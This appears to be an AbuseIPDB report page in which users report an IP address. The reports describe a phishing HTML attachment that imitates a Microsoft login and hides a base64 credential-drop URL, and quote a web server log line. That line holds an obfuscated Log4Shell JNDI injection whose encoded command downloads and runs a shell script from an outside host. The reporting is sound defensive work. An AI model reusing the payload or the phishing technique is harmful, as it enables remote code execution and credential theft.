I was sent an email with an "invoice" from a company I never heard of and a product I never bought. ... show moreI was sent an email with an "invoice" from a company I never heard of and a product I never bought. There was an HTML file attachment. Upon downloading and studying the code inside, I discovered that it was a HTML file made to imitate a Microsoft login form. This IP address was found base64 encoded in a hidden HTML input tag. The fully decoded text was "http://167.71.245.231/backUptester/1a6cih2w9s.php". This HTML input tag was next to a fake "Forgot my Password" link on the form. IP address seems to be owned by DigitalOcean. show less
This IP performed the following access request on my web server:
159.203.95.42 - - [17/Mar/20 ... show moreThis IP performed the following access request on my web server:
159.203.95.42 - - [17/Mar/2022:18:19:54 +0000] "GET /:80:undefined?id= HTTP/1.1" 404 1236 "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//159.203.109.65:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzE2Ny4xNzIuMjI2LjIyMi84VXNBLnNoOyBjdXJsIC1PIGh0dHA6Ly8xNjcuMTcyLjIyNi4yMjIvOFVzQS5zaDsgY2htb2QgNzc3IDhVc0Euc2g7IHNoIDhVc0Euc2g=}')" "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//159.203.109.65:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzE2Ny4xNzIuMjI2LjIyMi84VXNBLnNoOyBjdXJsIC1PIGh0dHA6Ly8xNjcuMTcyLjIyNi4yMjIvOFVzQS5zaDsgY2htb2QgNzc3IDhVc0Euc2g7IHNoIDhVc0Euc2g=}')" show less
Bad Web BotWeb App Attack
By clicking “Accept all”, you agree to the storing of cookies on your device to remember preferences and
analyze site usage.
Read more
- Required to log into your AbuseIPDB account, and store these cookie preferences.
167.71.245.231